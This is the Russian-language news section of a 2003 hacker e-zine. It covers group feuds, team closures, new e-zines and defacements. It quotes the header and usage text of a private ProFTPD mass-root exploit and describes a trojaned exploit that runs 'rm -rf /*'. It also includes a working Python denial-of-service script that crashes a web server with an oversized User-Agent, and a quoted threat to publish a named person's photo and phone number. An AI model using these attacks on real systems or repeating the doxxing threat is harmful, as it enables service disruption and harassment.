_-_-_-_- Scene newz -_-_-_-_
-_-_-_-_ -==-==-==- _-_-_-_-
[1] Шум вокруг Defaced
[2] Мы закрыли ZudTeam
[3] m00.void.ru/m00/ is really private??
[4] Три новых езина
[5] Кто подставил кролика роджера??
[6] Сайт nerf отдефейсили
[7] Управление "Р" и флуд
[8] Net Poison was closed
[9] m00d4rk и его k-3r33t 5pl01t
[1] Шум вокруг Defaced
Выход Defaced #3 заставил подняться на поверхность самые потаенные, я бы даже
сказал, глубинные, каловые массы рунета. Критические постинги стали сыпаться
один за другим без останова. Что же именно стало так неприятно и привлекательно
одновременно в этом журнале для ``ламмеров'' всем этим людям?? Это загадка. Но
некоторые предположения можно сделать, исходя из содержания комментариев,
которых, кстати, довольно много. Особо хочется отметить следующие три публикации:
- www.void.ru/content/1164
Заметка опубликована durito по собственным соображениям. Там не было ничего, но
содержание третьего номера. Заметку, в прочем, через некоторое время, по
просьбам телезрителей, удалили, ибо не круто )). На самом деле потому, что
начался банальный флейм.
Тем не менее, само сообщение со всеми комментариями можно посмотреть здесь:
- http://void.ru/?do=deleted_content&id=1164
- http://f0kp.iplus.ru/temp/d/void.ru
- www.securitylab.ru/41037.html
Это комментарий, который был сначала опубликован в форуме Defaced. Автор -
nometter <[email protected]>, также известный как d4rkgr3y [ thx 2 c0d3x за разведку
]. Почему форума журнала было недостаточно, и почему этот небольшой опус [ от
слова ``опустить'' ] был вынесен на более широкую, попсовую арену, вполне
понятно. Из всего что накомментировали в форуме секлаба, особо хочется выделить
одно: какой-то умник орал, мол, defaced должны выплатить секлабовцам лаве за
рекламу журнала )). Непонятно только почему мы, а не d4rkgr3y - он же запостил,
пусть и платит. А если уж на то пошло, то это секлаб должен нам за рекламу, вот
только мы не жадные - пусть рекламируется for free - все равно это ему не
поможет.
- www.nteam.ru/news/view/?id=32
На самом деле статья совсем не о defaced - она о состоянии сцены в целом, однако
в комментариях обсуждался в основном журнал. Особо преуспели в этом d4 (aka
d4rkg4y), lovchy и c0d3x. Ловчий говорит, что он ``клиент'' и что ему подсунули
``некачественный товар''. Какой к черту клиент и какой товар, неуважаемый г-н [
не обязательно значит ``господин'' ] Безруков. Клиент - это тот кто платит, а то
что вы так усердно критикуете, абсолютно бесплатно и читать вас никто не
заставляет. Поэтому если вам что-то и не понравилось, просто смолчите об этом.
Но вышеуказанного г-на даже не пришлось ловить на слове - явное несоответствие
его заявлений в сообщении, которое пришло на ящик журнала и тех, что были в
форуме nt, говорит о том, что на все его замечания можно не обращать внимания,
поскольку смысла в них не более чем хлебных крошек в курином дерьме.
Опять же, в силу неработоспособности nteam.ru в настоящее время, посмотреть
статью и комментарии можно на:
- http://f0kp.iplus.ru/temp/d/nteam.ru
[ там не самый свежий бэкап, но все что нужно есть ]
[2] Мы закрыли ZudTeam
Именно так почему-то склонны считать многие, главным образом сам wolf. Скажу
лишь, что это просто гон - после ухода костяка команды, она бы не продержалась в
любом случае, потому что вульфу это все не по зубам. Зато для него хороший
предлог, чтобы распустить остатки команды - мол, чувака обидили, типа он ничего
не мог сделать. Причиной, естесственно, принято называть статью, опубликованную
в D3. Лично мне плевать кто там что думает и пишет, по крайней мере это ну никак
не могло бы стать причиной развала команды. Отсюда выводы. Нижеследующее было
вывешено на главное странице zudteam.org
from zudteam.org import index.htm
"""
Я закрываю проект. Это нужно было сделать еще в июле. Уже тогда было понятно,что
команде, долго не продержаться.Могу сказать,что у нас был очень сильный
состав.Хорошие люди. Дружественная атмосфера. Но в команде были и поганые люди.
Точнее один.Его звали Дима. Для общественности nimber. Именно он и развалил все.
Он начал кидать понты и гнать на всех. Именно ему первому не понравилась
ситуация в команде. И он перешел. Забрав с собой грамотныйх людей. Я конечно
могу выложить тут его фотку, телефон и прочее. Пусть до него дойдет,что он
просто лох. И будет мне обязан. И это не шантаж. Его статья в дефейсед-это
просто наглость и идиотизм. Я не буду ничего объяснять. Все кто меня знают
поймут. Дима- ты ничтожество. Запомни на всегда. После команды остается только
irc канал #zudteam (irc.chatnet.ru/irc.dalnet.ru) И ZUD ZINE
http://content.mail.ru/pages/p_9445.html Я никуда не пропадаю,а буду заниматься
сам и своими делами. На последок хочу сказать спасибо этим людям:
Zet,Iww,unix,Pirog,Demon,Xspyd3x,dux,JLx,Over_G,Khmelic и многим другим.
Большое спасибо всем.Удачи. Увидимся.
"""
[3] m00.void.ru/m00/ is really private??
Наверно многие из вас слышали о наличии private base, расположенной по адресу,
указанному в хидере новости. Некоторые, возможно, узнали об этом из статьи,
опубликованной на http://www.nteam.ru/articles/privatezonez/ и имеют желание
знать, что же там лежит. На самом деле доступ получить может любой желающий, а
не только избранные. Но нужно ли оно вам? Ничего такого, чего нельзя было бы
найти в инете, там нет - просто там чуть более модернизированные версии уже
публиковавшихся эксплоитов. То есть, из всех адд-онов можно наблюдать лишь:
брутфорсер ret_addr, сканер сервисов и автоэксплойтинг [ в случае эксплоита для
proftpd ] и так далее, что вы сможете и сами сделать без труда. Вот заголовок
одного из этих 3r33t 0hd4y sh17:
/* proftpd_put_down2~m00.c
*
* ProFTPD 1.2.7 - 1.2.9rc2 mass autoroot exploit
* by m00 Security // m00.void.ru
*
* Private version of proftpd_put_down.c by Haggis
*
* History:
* - ISS X-Force posted information about "ProFTPD
* ASCII File Remote Compromise Vulnerability" [24/9/2003]
* - ProFTPd remote root exploit by bkbll [7/10/2003]
* - More powerful proftpd_put_down.c by Haggis [14/10/2003]
* - mass proftpd_put_down2~m00.c exploit by m00 Security
* [01/11/2003]
*
* Tested on SuSE 8.0, 8.1 and RedHat 7.2/8.0
* it works quite well... the RedHat boxes
* works in the 0xbffff2xx stack region;
* the SuSE boxes were somewhat earlier
* in the stack space - around 0xbfffe8xx.
*
* Greetz:
* - nerF security team // www.nerf.ru
* - Limpid Byte // lbyte.sysdrop.org
* - priv8security // www.priv8security.com
* - UHAGr // www.uhagr.com
* - and other ppl from #m00sec and #nerf (EFnet) that
* we like and respect.
*
* By rash [[email protected]] and d4rkgr3y [[email protected]]
*
* THIS IS UNPUBLISHED m00 EXPLOIT CODE
* KEEP IT PRIVATE
*/
А это вывод программы после запуска:
@----------------------------------------------@
ProFTPD 1.2.7 - 1.2.9rc2 remote r00t exploit
by Haggis ([email protected])
m00 EDITION
THIS EXPLOIT CODE IS NOW PRIVATE
@-----------------------------------------------@
Usage: ./scan -s <start ip> -e <end ip> [options]
Arguments:
-c <count> - count of connections for ip-range scan [30]
-t <seconds> - timeout for each connection [3]
-v - be more verbose
-n - don't beleave FTP banner (try to exploit every ftpd) hmm
-u <username> - [anonymous]
-p <password> - [[email protected]]
-l <local ip address> - interface to bind to
-U <path> - specify upload path, eg. /incoming
-P <port> - port number of remote proftpd server
-S <address> - start at <address> when bruteforcing
Поскольку nteam.ru временно отдыхает, прочесть вышеупомяную статью можно по
адресу http://f0kp.iplus.ru/temp/d/private_zonez
[4] Три новых езина
С момента выхода D3 вышло аж целых три новых электронных журнала. Вот немного о
них мы и расскажем.
Feeling of Digital Stream's [ FDS ], выпускается ребятами из Казахстана -
b3$t_m0w1 и Scorpio. В общем журнал довольно неплохо сделан. Начиная дизайном,
заканчивая контентом. Тематика статей журнала весьма разнообразна - присутствуют
отличные материалы по x.25, криптографии [ похоже авторы учатся на каком-нибудь
крипто-факе ) ], протоколам и многому другому. Радует также наличие множества
кода на python, только не стал бы журнал еженедельным справочником python ;). В
настоящее время доступно уже три выпуска этого журнала. Рекомендуем!!
Официальный сайт журнала: www.feelds.by.ru
ptz\Ezine издается птзхакерами и доступен, естесственно, где-то на сайте
ptzhack.net )). Особо ничего сказать не могу, так как не было достаточно времени
чтобы с ним ознакомиться. Авторы: snip3, Pirog, rust-resisting, ]X[dm, [r]007,
s1Dr3x, OldRastaman.
Ну и третий, который вышел совсем недавно - называется DarGON Magazine. Здесь
Dark Eagle и Unknown Author учат читателя писать service grabber'ы на delphi +
присутствует несколько док с увядающего void.ru
В интре косвенный намек на то, какое же дерьмо этот defaced и насколько жизнь
изменилась к лучшему с появлением DarGON )). Я даже в один момент подумал, что
DarGON значит ``Defaced are GON'' :).
Официальный сайт журнала: www.dargon-ezine.by.ru
В форуме npoison прочитал сообщение чела по имени movl, который призывает или
объявляет о создании нового журнала под его предводительством.. Самое
интересное, что этот movl.. в прочем ладно )). Будем ждать.
from http://www.npoison.ru/ import ?id=12
"""
Нам нужны люди. Мы решили создать сетевой zine, который будет посвящен security,
хакингу, фрикингу, вирьмейкингу, ос windows, ос unix, coding perl, c, asm, php и
мн. др. Причем проект не должен быть похож на xakep.ru and defaceD. Недолжно
быть никаких статей типа 'полное руководство по взлому гостевух и чатов', а так
же передраных статей, все исключительно свое! Зин планируется выпускаться 2-а
раза в месяц. Кто Заинтересован пишите на [email protected] Ответим на любое мыло
"""
Мля, defaced всем поперед глотки встал..
Эта, как там говорится.. дурной пример заразителен ).
[5] Кто подставил кролика роджера??
22.11.2003 в багтрак свалился m00-mod_gzip.c от d4rkgr3y <[email protected]>.
Эксплоит являет собой несколько модифицированную версию 85mod_gzip.c by xCrZx //
[email protected] - добавлено несколько новых ret_addr для различных
linux flavours ну и главный шеллкод заменен кодом, выполняющим rm -rf /* на
машине человека, его запустившего.
По информации с муры [ www.m00.ru ] - это подстава, эксплоит они, якобы, не
посылали, но насколько это верно, судить сложно, так как никто там не вызывает
доверия. Надеюсь, что это был последний постинг в рассылку от этой команды,
которая, похоже, уже успела обзавестись первыми фэнами )).
Код самого эксплоита можно взять на http://m00.void.ru/message и на пакетсторме.
[6] Сайт nerf отдефейсили
В ночь с 15 на 16 сентября nerf.ru, который хостится на машине ech0, был
изнасилован изнутри, то есть за счет неверной конфигурации машины при наличии
легального локального доступа. Если я все правильно понял, то это были ребята из
некогда популярной dev/ice crew.
Более подробно читайте на http://www.shit.ru/_files/nerf.txt, точнее наоборот,
http://www.nerf.ru/_files/shit.txt
ЗЫ. в курсе, что новость малость запоздала, но я только недавно это увидел ).
[7] Управление "Р" и флуд
Неизвестный хакИр зафлудил форум управления "Р" при ГУВД Самарской области.
Похоже, что это кто-то из DSTeam [ Disarm Samara Team // www.dsteam.best-host.ru
]. Сами результаты можно наблюдать, к примеру, здесь:
www.p.samara.ru/forum/index.asp?qs=101
[8] Net Poison was closed
Официально команда Net Posion была закрыта, хотя по их старому адресу [
www.npoison.ru ] доступен форум, в котором все прежние участники вроде как
активны и даже чего-то там делают.
[9] m00d4rk и его k-3r33t 5pl01t
Итак, имеем следующее: http://m00.void.ru/adv/adv004.txt
Читаем текст адвисори. BRS WebWeaver remote DoS vulnerability. При получении
длинного значения в поле User-Agent, http сервер валится и вешает систему [ из
фара процесс убить не пробовал?? у меня оно ничего не вешает ]. Теперь смотрим
эксплоит:
char request[50150] =
"GET /m00-r0cz HTTP/1.0\n"
"Accept: */*\n"
"Accept-Language: jp\n"
"Accept-Encoding: gzip, deflate\n"
"Host: m00security.org\n"
"User-Agent: ";
Скажите мне кто-нибудь, нахрена здесь все эти Accept-*, если сказано, что
эксплойтить будем через User-Agent - разве WW не принимает неполные пакеты или
не было времени разобраться как удалить из l33t_sp10it_template.c лишние
строки?? В первой строке запроса используется версия протокола 1.0 [ webweaver
не умеет HTTP/1.1 ] , зачем тогда писать поле Host: ??
Затем идет что-то совсем непонятное моему разуму:
<shit skipped>
//memset((request+98),0x41,c);
memset((request+strlen(request)),0x41,c);
/* l33t ;] */
request[strlen(request)] = 0x0a;
request[strlen(request)] = 0x43;
</shit skipped>
Очччень оптимизированный код )). И это вместо того чтобы просто, не выделываясь,
написать \nConnection: Keep-Alive\n\n [ что можно не писать вообще )) ] - за
счет этого разбавили код еще одним килобайтом мусора. Епта, дарк, пара строк на
питоне:
import socket
h=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
h.connect(('localhost',80))
h.send('GET /m00_sucks HTTP/1.0\r\n')
h.send('User-Agent: %s\n\n' % ('a'*50000))
h.close()
Кстати, если передать больше байт в поле [ 500K работает, точное число лень было
вычислять ] User-Agent, то сервер не потухнет, а просто порежет из лога IP.. Но
на самом деле там есть и более интересные атаки [ типа free disk space takeover,
memory leakage ] - если разрулить, получится еще два элитных адвисори, дерзай ).
Короче понты одни и размазывание соплей по стене, стоило ли это времени, которое
было потрачено на написание этого кода??
.:EOF:.